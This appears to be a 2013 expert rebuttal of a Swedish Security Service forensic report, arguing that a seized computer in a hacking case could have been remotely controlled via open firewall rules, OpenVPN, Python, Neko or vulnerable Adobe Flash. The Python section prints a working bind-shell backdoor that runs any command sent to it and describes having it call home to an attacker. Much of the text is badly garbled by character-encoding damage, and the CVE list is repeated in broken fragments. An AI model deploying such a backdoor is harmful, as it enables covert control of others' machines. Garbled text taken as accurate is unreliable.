comments on the security service investigation of remote control possibilities regarding seizure...

8/13/2019 Comments on the Security Service Investigation of Remote Control Possibilities Regarding Seizure Anakata 2012-

1/29

Comments on the Security Service Investigation of Remote

Control Possibilities regarding seizure 2012-0201-B2!02"-2#

Niklas Femerstrand

IT Security Researcher and Developer
mailto:[email protected]:[email protected]


2/29

1$ Introduction

2$ %he fire&all

"$ '(en)P*

+$ Python

!$ *e,o

#$ dobe .lash/$ iscallenous vulnerabilities

$ Conclusions


3/29

1$ Introduction

This paper responds to the investiation o! remote control possi"ilities reardin

se#ure $%&$'%$%&'()$*%$+'$, -ritten "y esper (lomstr/m0 Security Service IT

Security Specialist o! the Department o! In!ormation Security and 1reservation o!

2vidence in IT 2nvironments. This paper is -ritten !rom a scienti!ic point o! vie-rather than a criminal investiation anle.

esper -rites in his investiation report that no 3relevant4 traces had "een !ound

-hich -ould strenthen statements made "y de!endant )ott!rid Svartholm 5ar.

In this paper I -ill descri"e -hy this is -ron and ho- the !orensics analysis o!

sei#ure $%&$'%$%&'()$*%$+'$, has "een lackin.

esper has in his analysis solely !ocused on so!t-are directly mentioned "y the

de!endant in criminal investiative hearins6 1o-ershell Server0 Terminal Servicesand Remote Desktop. (y doin this the Security Service has assumed that the

de!endant has kno-lede a"out ho- the sei#ed computer -ould have "een

remotely controlled -hen he has in !act denied any kno-lede o! this repeatedly.

This -ay the Secret Service concludes that it could not !ind any services installed

-hich could "e used !or remotely controllin the sei#ed hard-are.

Throuhout its investiation the !ormulated conclusions have systematically "eenthat there are no traces o! computers havin "een remotely controlled. In this

speci!ic investiation the !ormulation shi!ts to the conclusion that there are nosins o! relevanttraces o! the computer havin "een remotely controlled. 7ence

there is a possi"ility that there are traces that indicate that $%&$'%$%&'()$*%$+'$,

has in !act "een remotely controlled "ut that the criminal investiators have not

!ound them to "e relevant in the case.

The criminal investiators !ail to de!ine -hat they consider relevant. These3irrelevant4 traces must "e presented so that the court can decide their relevance. It

is hihly questiona"le that these irrelevant traces that the !orensics analysts have

!ound have "een actively e8cluded !rom the concludin report.

It is also unkno-n -hat methods the !orensics analysts have used to make the

conclusions that they have made. I -ill come "ack to this point later in the paper.


4/29

2$ %he fire&all

The Secret Service has isolated their investiation to the locally installed so!t-are

!ire-all 5indo-s Fire-all. 9ultiple computers -ere sei#ed -hen the de!endant

-as arrested in 1hnom 1enh0 :am"odia0 in $%&$. This so!t-are !ire-all is not so

important that it deserves !ull !ocus "y the Secret Service. 9ultiple Internetconnected computers -ere !ound in the de!endants apartment. In order to connect

multiple computers to the Internet !rom the same location one must !irst connect

the computers into a net-ork and then connect the net-ork to the Internet throuh

a router.

5hen the de!endant -as arrested the !ollo-in o";ects -ere sei#ed and handed

over to S-edish 1olice o!!icers that directly prove the e8istence o! additional

!ire-alls in the net-ork6 . 5ireless =ccess 1oint0 &%. 9odem on0 &$. 1lastic

:over "elonin to a S-itch0 $. 1lastic :over "elonin to a Router.

9ultiple computers and equipment required to connect multiple computers to a

net-ork -as !ound. Durin the arrest the o!!icers sei#ed the plastic cover

"elonin to a router "ut not the router itsel!. They also did not document -hat

kind o! router it -as.

There is no router "ein manu!actured today that does not have a "uilt in !ire-allas it is a !undamental security requirement !or private net-orks. (y usin routers

-ith "uilt in !ire-alls private net-orks are protected "y hardened security aainstconnections "ein made !rom the outside to the inside. Normally people rely on

the !ire-all "uilt directly into the router !or protection aainst attacks !rom the

outside.

Due to the possi"ilities that the de!endant?s computer may in !act have "een

remotely controlled "y people connectin !rom the Internet0 the outside o! thelocal private net-ork0 it is very important to analy#e the con!iuration on the

!ire-all "uilt into the router.

In this case o!!icers have neither sei#ed the router0 documented the router nor

conducted !orensics analysis on the router. That there has "een at least one !ire-all

in the de!endant?s net-ork in addition to the so!t-are !ire-all locally installed on

the sei#ed computer is an o"vious !act.


5/29

n the !inal pae o! the report -ritten "y the Security Service it is listed that all

services in the local so!t-are !ire-all allo-ed all computers connectivity to all

ena"led services !or any user.

The de!endant is previously convicted !or havin "uilt the larest !ilesharin portal

in the -orld. It is there!or very likely that he has opened ports in the router?s!ire-all so that he can illeally do-nload copyrihted material !rom the Internet.

(y openin ports in his router?s !ire-all he can immediately "ecome a taret !or

attackers that can e8ploit vulnera"le services. I -ill return to this point later in the

paper.

Since the router and its included !ire-all has not "een analy#ed it is impossi"le to

e8clude that these ports could have "een used to connect to the sei#ed computer

throuh other means than "y connectin to the listenin services analy#ed in the

investiation. In the listed !ire-all rules it is clear that all allo-ed services have"een allo-ed tra!!ic on any local and remote port.

The de!endant is convicted !or havin created the -orld?s larest (itTorrent

trackers. Normally (itTorrent clients don?t accept communication on one sinle

port "ut a rane o! ports. For the sake o! e8ample let?s say portrane &%%%'$%%%. I!

the de!endant has "een !ilesharin on this port rane and then accidentally had a

vulnera"le proram acceptin communications0 !or e8ample on port &*%%0 thenconsequently an attacker could connect to the vulnera"le proram on port &*%%

and that -ay hack into the de!endant?s computer.

5hat?s important to note here is that a router?s !ire-all rules persist until they are

removed either "y recon!iurin the !ire-all rules or "y resettin the router

con!iuration entirely. 2ven i! the de!endant himsel! has not "een !ilesharin0 or

!or other reasons opened ports in his !ire-all "uilt into his router0 it is not unlikely

that he has had visitors !or -hom ports have "een opened and then !orotten.

The !orensics report does not state i! the de!endant?s computer has used a static or

dynamic I1 assinment on his net-ork devices. 1orts are not only opened in the

router0 they are more speci!ically !or-arded to a local I1 address. 7avin a

dynamic I1 address means that the I1 address chanes everytime the computer

connects to the net-ork. =s an e8ample0 the de!endant may have had a visitor over

a -eekend -ho -as assined I1 &A$.&,B.&+.+ and then had port &*%% !or-arded

to it. 5hen the visitor leaves the I1 is availa"le and it is possi"le that one o! thetimes that the de!endant?s computer connected to the same net-ork the computer


6/29

-as dynamically assined an I1 -hich had a previous port !or-arded to it. This

-ay not only can the de!endant?s computer have "een remotely controlled "y

someone -ith authori#ation "ut also hacked "y unauthori#ed attackers.

+. '(en)P*

The !orensics report includes the !ull 5indo-s Fire-all ruleset. n paes C and *

the list includes the !ollo-in applications6 openvpn0 pen1N )EI and

openvpnserv. pen1N is an open source so!t-are -hich implements virtual

private net-ork 1NG techniques !or creatin secure point'to'point connections

in routed or "rided con!iurations and remote access !acilities.

(y connectin to a 1N the client computer ;oins a virtual net-ork that is equally

accessi"le to other computers in the same virtual net-ork as it -ould "e i! they

-ere in the same local net-ork.

pen1N has the a"ility to -ork throuh Net-ork =ddress Translation N=TG

and "ypassin !ire-alls. The sei#ed computer has had "oth the pen1N client

and server so!t-are installed and allo-ed in the !ire-all rules meanin that not

only could the de!endant?s computer connect to other 1N servers "ut other

computers could also connect to his.

(y someho- ;oinin a 1N0 either throuh other clients connectin to the sei#ed

computer or "y the sei#ed computer connectin to a 1N server0 it is possi"le !orother computers in the same 1N to use local shared resources6 such as directories

shared in the local net-ork0 meanin that other computers can have manipulated

the contents o! the sei#ed computer?s harddrive.

+$ Python

1ae * in the !orensics report lists the 1ython application. This application is the

interpreter !or the 1ython scriptin lanuae. 1ython is a very popular

prorammin lanuae that is e8ecuted in realtime makin it very di!!icult to

kno- -hat it?s actually doin. The -ay that it -orks is that 1ython reads a !ile and

compiles it to "inary !ormat in realtime upon e8ecution. ust like all other

prorams in the 5indo-s Fire-all0 1ython listens on communications !rom any

source I1'address on any local protocol and port.


7/29

For e8ample0 i! an attacker -anted to hack and take !ull control o! the de!endant?s

computer "y usin 1ython0 he could send a completely leit !ile to the de!endant

containin a "ackdoor. = 1ython script !or remotely controllin a computer could

look like this6

import socketimport subprocess

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)) !i"# to port $$$$ (e%&mp'e) o" &" "etork #e*ices.bi"#((++, $$$$))s.'iste"() Accept co""ectio"s -rom c'ie"tsco"", #r = s.&ccept()

oop -ore*er

/i'e 0 Re comm&"# se"t -rom c'ie"t#&t& = co"".rec*(123) C'ose 'i"k i- "o comm&"# is recei*e#i- "ot #&t&0 bre&kpri"t(+456 Co""ectio" est&b'is/e#+) E%ecute recei*e# comm&"#output = subprocess.c/eck_output(#&t&.#eco#e().rstrip()) Se"# output o- e%ecute# comm&"# b&ck to t/e c'ie"tco"".se"#(+O7T87T9"::::::9"+.e"co#e())co"".se"#(output)

co"".c'ose()

5hen runnin the script a"ove it creates a socket that listens on port AAAA -hich

accepts connections on any net-ork device on the computer. It then -aits !or

clients to connect to it0 reads received commands0 e8ecutes them and returns the

command output to the client.

=s an e8ample this is -hat it looks like -hen a client connects to the server andlists the !iles in the current directory6

; te'"et 'oc&'/ost $$$$Co""ecte# to 'oc&'/ost.Esc&pe c/&r&cter is


8/29

In reality a hacker -ould "ind the proram to an I1 address -hich is accessi"le

!rom the Internet. In the case -here 1ython is allo-ed to communicate -ith

anythin on the Internet and anythin on the Internet is allo-ed to communicate

-ith 1ython due to the set !ire-all rules6 prorammatically detectin the I1

address -hich is !acin the e8ternal -orld is a simple task. There is a tremendous

amount o! pu"lic -e"sites -hich tell visitors -hat I1 address they are usin andthey can "e parsed simply. nce the e8ternal I1 address has "een discovered it is

only a matter !or the script to loop connection attempts to !iure out -hich port an

outside hacker can connect to. nce the I1 and port has "een esta"lished the script

can start listenin on it and then call home to a computer -hich is controlled "y

the hacker to !ind out e8actly -here he can connect to remotely control the

de!endant?s computer.

In this scenario0 since our "ackdoor proram doesn?t -rite any los to the

harddrive0 !orensics analysts -ould !ail to !ind connection tracesH simply "ecausenone are saved.

)iven the current circumstances o! the 5indo-s Fire-all con!iuration this very

simple "ackdoor creates the per!ect opportunity to remotely control the de!endant?s

computer.

In conclusion6 the de!endant?s computer may have "een remotely controlled-ithout the de!endant?s kno-lede. The "ackdoor iven as an e8ample -ould not

"e detected as antivirus so!t-are "ecause it?s completely normal net-orkedso!t-are "ehavior.

#$ *e,o

1ae C in the !orensics report lists neko and nekotools. Neko is a prorammin

lanuae that -orks similarly to 1ython. There!or -e can conclude that thede!endant?s computer could also have "een remotely controlled via Neko as in the

case -ith 1ython illustrated a"ove.


9/29

/$ dobe .lash

1ae + in the !orensics report reveals that the !ollo-in versions o! =do"e Flash

have not only "een installed "ut had !ull a"ilities to accept and send net-ork

tra!!ic "et-een the sei#ed computer6 =do"e Flash 1layer &&.% r&0 =do"e Flash

&&.$0 =do"e Flash &&.+ and =do"e Flash &&.C. =do"e Flash is a multimedia andso!t-are plat!orm used !or authorin o! vector raphics0 animation0 ames and rich

Internet applications RI=sG that can "e vie-ed0 played and e8ecuted in =do"e

Flash 1layer.

(elo- is a list o! security vulnera"ilities that the de!endant?s installed versions o!

=do"e Flash are vulnera"le to. nly those that ena"le hackers to take control o!

the de!endant?s computer "y remotely e8ecutin malicious code are listed6

C)-201"-""+/ htt(344&&&$cvedetails$com4cve4C)-201"-""+/4Inteer over!lo- in =do"e Flash 1layer "e!ore &&..%%.$+$ and &&.B.8 "e!ore &&.B.B%%.AC on

5indo-s and 9ac S 0 "e!ore &&.$.$%$.$A on Jinu80 "e!ore &&.&.&&&.,C on =ndroid $.8 and +.80and "e!ore &&.&.&&*.,A on =ndroid C.8 allo-s attackers to e8ecute ar"itrary code via 1:9 data that is

not properly handled durin resamplin.

C)-201"-""+! htt(344&&&$cvedetails$com4cve4C)-201"-""+!4

=do"e Flash 1layer "e!ore &&..%%.$+$ and &&.B.8 "e!ore &&.B.B%%.AC on 5indo-s and 9ac S 0

"e!ore &&.$.$%$.$A on Jinu80 "e!ore &&.&.&&&.,C on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.,A on=ndroid C.8 allo-s attackers to e8ecute ar"itrary code or cause a denial o! service memory corruptionG

via unspeci!ied vectors.

C)-201"-""++ htt(344&&&$cvedetails$com4cve4C)-201"-""++4

7eap'"ased "u!!er over!lo- in =do"e Flash 1layer "e!ore &&..%%.$+$ and &&.B.8 "e!ore &&.B.B%%.AC

on 5indo-s and 9ac S 0 "e!ore &&.$.$%$.$A on Jinu80 "e!ore &&.&.&&&.,C on =ndroid $.8 and +.80

and "e!ore &&.&.&&*.,A on =ndroid C.8 allo-s attackers to e8ecute ar"itrary code via unspeci!iedvectors.

C)-201"-""+" htt(344&&&$cvedetails$com4cve4C)-201"-""+"4

=do"e Flash 1layer "e!ore &%.+.&B+.A% and &&.8 "e!ore &&..%%.$$C on 5indo-s0 "e!ore &%.+.&B+.A%

and &&.8 "e!ore &&..%%.$$* on 9ac S 0 "e!ore &%.+.&B+.A% and &&.8 "e!ore &&.$.$%$.$A& on

Jinu80 "e!ore &&.&.&&&.*A on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.,+ on =ndroid C.8H =do"e =IR

"e!ore +..%.$%A% on 5indo-s and =ndroid and "e!ore +..%.$&%% on 9ac S H and =do"e =IR SDKL :ompiler "e!ore +..%.$%A% on 5indo-s and "e!ore +..%.$&%% on 9ac S allo- attackers to

e8ecute ar"itrary code or cause a denial o! service memory corruptionG via unspeci!ied vectors.
http://www.cvedetails.com/cve/CVE-2013-3347/http://www.cvedetails.com/cve/CVE-2013-3345/http://www.cvedetails.com/cve/CVE-2013-3344/http://www.cvedetails.com/cve/CVE-2013-3343/http://www.cvedetails.com/cve/CVE-2013-3347/http://www.cvedetails.com/cve/CVE-2013-3345/http://www.cvedetails.com/cve/CVE-2013-3344/http://www.cvedetails.com/cve/CVE-2013-3343/


10/29

C)-201"-"""! htt(344&&&$cvedetails$com4cve4C)-201"-"""!4

=do"e Flash 1layer "e!ore &%.+.&B+.B, and &&.8 "e!ore &&..%%.$%$ on 5indo-s and 9ac S 0

"e!ore &%.+.&B+.B, and &&.8 "e!ore &&.$.$%$.$B* on Jinu80 "e!ore &&.&.&&&.*C on =ndroid $.8 and +.80

and "e!ore &&.&.&&*.*B on =ndroid C.8H =do"e =IR "e!ore +..%.&B,%H and =do"e =IR SDK L:ompiler "e!ore +..%.&B,% allo- attackers to e8ecute ar"itrary code or cause a denial o! service

memory corruptionG via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'$$B0 :2'

$%&+'++$C0 :2'$%&+'++$*0 :2'$%&+'++$,0 :2'$%&+'++$0 :2'$%&+'++$B0 :2'$%&+'++$A0:2'$%&+'+++%0 :2'$%&+'+++&0 :2'$%&+'+++$0 :2'$%&+'++++0 and :2'$%&+'+++C.

C)-201"-"""+ htt(344&&&$cvedetails$com4cve4C)-201"-"""+4





$%&+'++$C0 :2'$%&+'++$*0 :2'$%&+'++$,0 :2'$%&+'++$0 :2'$%&+'++$B0 :2'$%&+'++$A0

:2'$%&+'+++%0 :2'$%&+'+++&0 :2'$%&+'+++$0 :2'$%&+'++++0 and :2'$%&+'+++*.

C)-201"-"""" htt(344&&&$cvedetails$com4cve4C)-201"-""""4

=do"e Flash 1layer "e!ore &%.+.&B+.B, and &&.8 "e!ore &&..%%.$%$ on 5indo-s and 9ac S 0"e!ore &%.+.&B+.B, and &&.8 "e!ore &&.$.$%$.$B* on Jinu80 "e!ore &&.&.&&&.*C on =ndroid $.8 and +.80

and "e!ore &&.&.&&*.*B on =ndroid C.8H =do"e =IR "e!ore +..%.&B,%H and =do"e =IR SDK L

:ompiler "e!ore +..%.&B,% allo- attackers to e8ecute ar"itrary code or cause a denial o! servicememory corruptionG via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'$$B0 :2'

$%&+'++$C0 :2'$%&+'++$*0 :2'$%&+'++$,0 :2'$%&+'++$0 :2'$%&+'++$B0 :2'$%&+'++$A0

:2'$%&+'+++%0 :2'$%&+'+++&0 :2'$%&+'+++$0 :2'$%&+'+++C0 and :2'$%&+'+++*.

C)-201"-"""2 htt(344&&&$cvedetails$com4cve4C)-201"-"""24


"e!ore &%.+.&B+.B, and &&.8 "e!ore &&.$.$%$.$B* on Jinu80 "e!ore &&.&.&&&.*C on =ndroid $.8 and +.80and "e!ore &&.&.&&*.*B on =ndroid C.8H =do"e =IR "e!ore +..%.&B,%H and =do"e =IR SDK L

:ompiler "e!ore +..%.&B,% allo- attackers to e8ecute ar"itrary code or cause a denial o! service

memory corruptionG via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'$$B0 :2'$%&+'++$C0 :2'$%&+'++$*0 :2'$%&+'++$,0 :2'$%&+'++$0 :2'$%&+'++$B0 :2'$%&+'++$A0

:2'$%&+'+++%0 :2'$%&+'+++&0 :2'$%&+'++++0 :2'$%&+'+++C0 and :2'$%&+'+++*.






$%&+'++$C0 :2'$%&+'++$*0 :2'$%&+'++$,0 :2'$%&+'++$0 :2'$%&+'++$B0 :2'$%&+'++$A0:2'$%&+'+++%0 :2'$%&+'+++$0 :2'$%&+'++++0 :2'$%&+'+++C0 and :2'$%&+'+++*.
http://www.cvedetails.com/cve/CVE-2013-3335/http://www.cvedetails.com/cve/CVE-2013-3334/http://www.cvedetails.com/cve/CVE-2013-3333/http://www.cvedetails.com/cve/CVE-2013-3332/http://www.cvedetails.com/cve/CVE-2013-3331/http://www.cvedetails.com/cve/CVE-2013-3335/http://www.cvedetails.com/cve/CVE-2013-3334/http://www.cvedetails.com/cve/CVE-2013-3333/http://www.cvedetails.com/cve/CVE-2013-3332/http://www.cvedetails.com/cve/CVE-2013-3331/


11/29






$%&+'++$C0 :2'$%&+'++$*0 :2'$%&+'++$,0 :2'$%&+'++$0 :2'$%&+'++$B0 :2'$%&+'++$A0:2'$%&+'+++&0 :2'$%&+'+++$0 :2'$%&+'++++0 :2'$%&+'+++C0 and :2'$%&+'+++*.

C)-201"-""25 htt(344&&&$cvedetails$com4cve4C)-201"-""254





$%&+'++$C0 :2'$%&+'++$*0 :2'$%&+'++$,0 :2'$%&+'++$0 :2'$%&+'++$B0 :2'$%&+'+++%0

:2'$%&+'+++&0 :2'$%&+'+++$0 :2'$%&+'++++0 :2'$%&+'+++C0 and :2'$%&+'+++*.

C)-201"-""2 htt(344&&&$cvedetails$com4cve4C)-201"-""24



:ompiler "e!ore +..%.&B,% allo- attackers to e8ecute ar"itrary code or cause a denial o! servicememory corruptionG via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'$$B0 :2'

$%&+'++$C0 :2'$%&+'++$*0 :2'$%&+'++$,0 :2'$%&+'++$0 :2'$%&+'++$A0 :2'$%&+'+++%0

:2'$%&+'+++&0 :2'$%&+'+++$0 :2'$%&+'++++0 :2'$%&+'+++C0 and :2'$%&+'+++*.

C)-201"-""2/ htt(344&&&$cvedetails$com4cve4C)-201"-""2/4


"e!ore &%.+.&B+.B, and &&.8 "e!ore &&.$.$%$.$B* on Jinu80 "e!ore &&.&.&&&.*C on =ndroid $.8 and +.80and "e!ore &&.&.&&*.*B on =ndroid C.8H =do"e =IR "e!ore +..%.&B,%H and =do"e =IR SDK L

:ompiler "e!ore +..%.&B,% allo- attackers to e8ecute ar"itrary code or cause a denial o! service

memory corruptionG via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'$$B0 :2'$%&+'++$C0 :2'$%&+'++$*0 :2'$%&+'++$,0 :2'$%&+'++$B0 :2'$%&+'++$A0 :2'$%&+'+++%0

:2'$%&+'+++&0 :2'$%&+'+++$0 :2'$%&+'++++0 :2'$%&+'+++C0 and :2'$%&+'+++*.

C)-201"-""2# htt(344&&&$cvedetails$com4cve4C)-201"-""2#4





$%&+'++$C0 :2'$%&+'++$*0 :2'$%&+'++$0 :2'$%&+'++$B0 :2'$%&+'++$A0 :2'$%&+'+++%0:2'$%&+'+++&0 :2'$%&+'+++$0 :2'$%&+'++++0 :2'$%&+'+++C0 and :2'$%&+'+++*.


12/29

C)-201"-""2! htt(344&&&$cvedetails$com4cve4C)-201"-""2!4





$%&+'++$C0 :2'$%&+'++$,0 :2'$%&+'++$0 :2'$%&+'++$B0 :2'$%&+'++$A0 :2'$%&+'+++%0:2'$%&+'+++&0 :2'$%&+'+++$0 :2'$%&+'++++0 :2'$%&+'+++C0 and :2'$%&+'+++*.

C)-201"-""2+ htt(344&&&$cvedetails$com4cve4C)-201"-""2+4





$%&+'++$*0 :2'$%&+'++$,0 :2'$%&+'++$0 :2'$%&+'++$B0 :2'$%&+'++$A0 :2'$%&+'+++%0

:2'$%&+'+++&0 :2'$%&+'+++$0 :2'$%&+'++++0 :2'$%&+'+++C0 and :2'$%&+'+++*.

C)-201"-2/2 htt(344&&&$cvedetails$com4cve4C)-201"-2/24



:ompiler "e!ore +..%.&B,% allo- attackers to e8ecute ar"itrary code or cause a denial o! servicememory corruptionG via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'++$C0 :2'

$%&+'++$*0 :2'$%&+'++$,0 :2'$%&+'++$0 :2'$%&+'++$B0 :2'$%&+'++$A0 :2'$%&+'+++%0

:2'$%&+'+++&0 :2'$%&+'+++$0 :2'$%&+'++++0 :2'$%&+'+++C0 and :2'$%&+'+++*.

C)-201"-2!!! htt(344&&&$cvedetails$com4cve4C)-201"-2!!!4

Inteer over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.* and &&.8 "e!ore &&..%%.&,A on 5indo-s

and 9ac S 0 "e!ore &%.+.&B+.* and &&.8 "e!ore &&.$.$%$.$B% on Jinu80 "e!ore &&.&.&&&.*% on=ndroid $.8 and +.80 and "e!ore &&.&.&&*.*C on =ndroid C.8H =do"e =IR "e!ore +..%.&*+%H and =do"e

=IR SDK L :ompiler "e!ore +..%.&*+% allo-s remote attackers to e8ecute ar"itrary code via

unspeci!ied vectors0 as demonstrated "y E12N durin a 1-n$-n competition at :anSec5est $%&+.

C)-201"-1"0 htt(344&&&$cvedetails$com4cve4C)-201"-1"04

=do"e Flash 1layer "e!ore &%.+.&B+.* and &&.8 "e!ore &&..%%.&,A on 5indo-s and 9ac S 0"e!ore &%.+.&B+.* and &&.8 "e!ore &&.$.$%$.$B% on Jinu80 "e!ore &&.&.&&&.*% on =ndroid $.8 and +.80

and "e!ore &&.&.&&*.*C on =ndroid C.8H =do"e =IR "e!ore +..%.&*+%H and =do"e =IR SDK L

:ompiler "e!ore +..%.&*+% allo- attackers to e8ecute ar"itrary code or cause a denial o! service

memory corruptionG via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'&+B.

C)-201"-1"/5 htt(344&&&$cvedetails$com4cve4C)-201"-1"/54

=do"e Flash 1layer "e!ore &%.+.&B+.* and &&.8 "e!ore &&..%%.&,A on 5indo-s and 9ac S 0"e!ore &%.+.&B+.* and &&.8 "e!ore &&.$.$%$.$B% on Jinu80 "e!ore &&.&.&&&.*% on =ndroid $.8 and +.80

and "e!ore &&.&.&&*.*C on =ndroid C.8H =do"e =IR "e!ore +..%.&*+%H and =do"e =IR SDK L

:ompiler "e!ore +..%.&*+% do not properly initiali#e pointer arrays0 -hich allo-s attackers to e8ecutear"itrary code or cause a denial o! service memory corruptionG via unspeci!ied vectors.
http://www.cvedetails.com/cve/CVE-2013-3325/http://www.cvedetails.com/cve/CVE-2013-3324/http://www.cvedetails.com/cve/CVE-2013-2728/http://www.cvedetails.com/cve/CVE-2013-2555/http://www.cvedetails.com/cve/CVE-2013-1380/http://www.cvedetails.com/cve/CVE-2013-1379/http://www.cvedetails.com/cve/CVE-2013-3325/http://www.cvedetails.com/cve/CVE-2013-3324/http://www.cvedetails.com/cve/CVE-2013-2728/http://www.cvedetails.com/cve/CVE-2013-2555/http://www.cvedetails.com/cve/CVE-2013-1380/http://www.cvedetails.com/cve/CVE-2013-1379/


13/29

C)-201"-1"/ htt(344&&&$cvedetails$com4cve4C)-201"-1"/4

=do"e Flash 1layer "e!ore &%.+.&B+.* and &&.8 "e!ore &&..%%.&,A on 5indo-s and 9ac S 0

"e!ore &%.+.&B+.* and &&.8 "e!ore &&.$.$%$.$B% on Jinu80 "e!ore &&.&.&&&.*% on =ndroid $.8 and +.80

and "e!ore &&.&.&&*.*C on =ndroid C.8H =do"e =IR "e!ore +..%.&*+%H and =do"e =IR SDK L:ompiler "e!ore +..%.&*+% allo- attackers to e8ecute ar"itrary code or cause a denial o! service

memory corruptionG via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'&+B%.

C)-201"-1"/! htt(344&&&$cvedetails$com4cve4C)-201"-1"/!4

7eap'"ased "u!!er over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.,B and &&.8 "e!ore &&.,.,%$.&B% on

5indo-s and 9ac S 0 "e!ore &%.+.&B+.,B and &&.8 "e!ore &&.$.$%$.$* on Jinu80 "e!ore&&.&.&&&.CC on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.CB on =ndroid C.8H =do"e =IR "e!ore

+.,.%.,%A%H =do"e =IR SDK "e!ore +.,.%.,%A%H and =do"e =IR SDK L :ompiler "e!ore +.,.%.,%A%

allo-s attackers to e8ecute ar"itrary code via unspeci!ied vectors.

C)-201"-1"/+ htt(344&&&$cvedetails$com4cve4C)-201"-1"/+4

Ese'a!ter'!ree vulnera"ility in =do"e Flash 1layer "e!ore &%.+.&B+.,+ and &&.8 "e!ore &&.,.,%$.&,B on

5indo-s0 "e!ore &%.+.&B+.,& and &&.8 "e!ore &&.,.,%$.&, on 9ac S 0 "e!ore &%.+.&B+.,& and &&.8"e!ore &&.$.$%$.$% on Jinu80 "e!ore &&.&.&&&.C+ on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.C on

=ndroid C.8H =do"e =IR "e!ore +.,.%.*AH and =do"e =IR SDK "e!ore +.,.%.*AA allo-s attackers to

e8ecute ar"itrary code via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'%,CC and :2'$%&+'%,CA.

C)-201"-1"/" htt(344&&&$cvedetails$com4cve4C)-201"-1"/"4

(u!!er over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.,+ and &&.8 "e!ore &&.,.,%$.&,B on 5indo-s0

"e!ore &%.+.&B+.,& and &&.8 "e!ore &&.,.,%$.&, on 9ac S 0 "e!ore &%.+.&B+.,& and &&.8 "e!ore

&&.$.$%$.$% on Jinu80 "e!ore &&.&.&&&.C+ on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.C on =ndroid

C.8H =do"e =IR "e!ore +.,.%.*AH and =do"e =IR SDK "e!ore +.,.%.*AA allo-s attackers to e8ecutear"itrary code via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'%,C$0 :2'$%&+'%,C*0

:2'$%&+'&+,*0 :2'$%&+'&+,,0 :2'$%&+'&+,0 :2'$%&+'&+,B0 :2'$%&+'&+,A0 :2'$%&+'

&+%0 and :2'$%&+'&+$.


(u!!er over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.,+ and &&.8 "e!ore &&.,.,%$.&,B on 5indo-s0"e!ore &%.+.&B+.,& and &&.8 "e!ore &&.,.,%$.&, on 9ac S 0 "e!ore &%.+.&B+.,& and &&.8 "e!ore



:2'$%&+'&+,*0 :2'$%&+'&+,,0 :2'$%&+'&+,0 :2'$%&+'&+,B0 :2'$%&+'&+,A0 :2'$%&+'

&+%0 and :2'$%&+'&++.


=do"e Flash 1layer "e!ore &%.+.&B+.,B and &&.8 "e!ore &&.,.,%$.&B% on 5indo-s and 9ac S 0

"e!ore &%.+.&B+.,B and &&.8 "e!ore &&.$.$%$.$* on Jinu80 "e!ore &&.&.&&&.CC on =ndroid $.8 and +.80and "e!ore &&.&.&&*.CB on =ndroid C.8H =do"e =IR "e!ore +.,.%.,%A%H =do"e =IR SDK "e!ore

+.,.%.,%A%H and =do"e =IR SDK L :ompiler "e!ore +.,.%.,%A% allo- attackers to e8ecute ar"itrary

code or cause a denial o! service memory corruptionG via unspeci!ied vectors.


14/29




&&.$.$%$.$% on Jinu80 "e!ore &&.&.&&&.C+ on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.C on =ndroidC.8H =do"e =IR "e!ore +.,.%.*AH and =do"e =IR SDK "e!ore +.,.%.*AA allo-s attackers to e8ecute

ar"itrary code via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'%,C$0 :2'$%&+'%,C*0

:2'$%&+'&+,*0 :2'$%&+'&+,,0 :2'$%&+'&+,0 :2'$%&+'&+,B0 :2'$%&+'&+,A0 :2'$%&+'&+$0 and :2'$%&+'&++.

C)-201"-1"#5 htt(344&&&$cvedetails$com4cve4C)-201"-1"#54





:2'$%&+'&+,*0 :2'$%&+'&+,,0 :2'$%&+'&+,0 :2'$%&+'&+,B0 :2'$%&+'&+%0 :2'$%&+'

&+$0 and :2'$%&+'&++.

C)-201"-1"# htt(344&&&$cvedetails$com4cve4C)-201"-1"#4

(u!!er over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.,+ and &&.8 "e!ore &&.,.,%$.&,B on 5indo-s0"e!ore &%.+.&B+.,& and &&.8 "e!ore &&.,.,%$.&, on 9ac S 0 "e!ore &%.+.&B+.,& and &&.8 "e!ore



:2'$%&+'&+,*0 :2'$%&+'&+,,0 :2'$%&+'&+,0 :2'$%&+'&+,A0 :2'$%&+'&+%0 :2'$%&+'

&+$0 and :2'$%&+'&++.

C)-201"-1"#/ htt(344&&&$cvedetails$com4cve4C)-201"-1"#/4


"e!ore &%.+.&B+.,& and &&.8 "e!ore &&.,.,%$.&, on 9ac S 0 "e!ore &%.+.&B+.,& and &&.8 "e!ore&&.$.$%$.$% on Jinu80 "e!ore &&.&.&&&.C+ on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.C on =ndroid

C.8H =do"e =IR "e!ore +.,.%.*AH and =do"e =IR SDK "e!ore +.,.%.*AA allo-s attackers to e8ecute

ar"itrary code via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'%,C$0 :2'$%&+'%,C*0:2'$%&+'&+,*0 :2'$%&+'&+,,0 :2'$%&+'&+,B0 :2'$%&+'&+,A0 :2'$%&+'&+%0 :2'$%&+'

&+$0 and :2'$%&+'&++.

